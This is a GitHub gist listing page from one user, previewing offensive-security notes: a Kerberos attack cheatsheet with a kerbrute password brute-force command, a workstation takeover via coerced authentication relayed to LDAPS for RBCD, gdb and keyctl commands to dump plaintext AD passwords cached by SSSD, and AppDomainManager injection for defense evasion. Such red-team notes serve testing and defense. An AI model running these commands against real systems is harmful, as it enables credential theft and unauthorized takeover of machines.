Skip to content

Instantly share code, notes, and snippets.

@gladiatx0r
gladiatx0r / kerberos_attacks_cheatsheet.md
Created Sep 18, 2021 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
View kerberos_attacks_cheatsheet.md

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@gladiatx0r
gladiatx0r / Workstation-Takeover.md
Last active Sep 20, 2022
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure
View Workstation-Takeover.md

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@gladiatx0r
gladiatx0r / gist:c52d529ea268f7e74295c2c492cf9774
Created Oct 6, 2020 — forked from jeffmcjunkin/gist:d5fb8dbf15cbd5d37a77fafccda4d969
Retrieving SSSD plain text passwords (krb5_store_password_if_offline)
View gist:c52d529ea268f7e74295c2c492cf9774
for who ever this interest, if you enable krb5_store_password_if_offline in the SSSD configuration, the AD password for accounts is stored in plaintext in the kernel keyring
to dump the clear text password you can do :
```
gdb -p <PID_OF_SSSD>
call system("keyctl show > /tmp/output")
```
From the /tmp/output locate the key_id for the user you want
Example of an output is :
@gladiatx0r
gladiatx0r / _notes.md
Last active Oct 5, 2021 — forked from djhohnstein/_notes.md
AppDomainManager Injection
View _notes.md

Let's turn Any .NET Application into an LOL Bin

We can do this by experimenting with .config files.

Many defenders catch/detect files that are renamed, they do this by matching Original Filename to Process Name

In this example, we don't have to rename anything. We simple coerce a trusted signed app to load our Assembly.

We do this by directing the application to read a config file we provide.

@gladiatx0r
gladiatx0r / _notes.md
Created Mar 12, 2020
AppDomainManager Injection
View _notes.md

Let's turn Any .NET Application into an LOL Bin

We can do this by experimenting with .config files.

Many defenders catch/detect files that are renamed, they do this by matching Original Filename to Process Name

In this example, we don't have to rename anything. We simple coerce a trusted signed app to load our Assembly.

We do this by directing the application to read a config file we provide.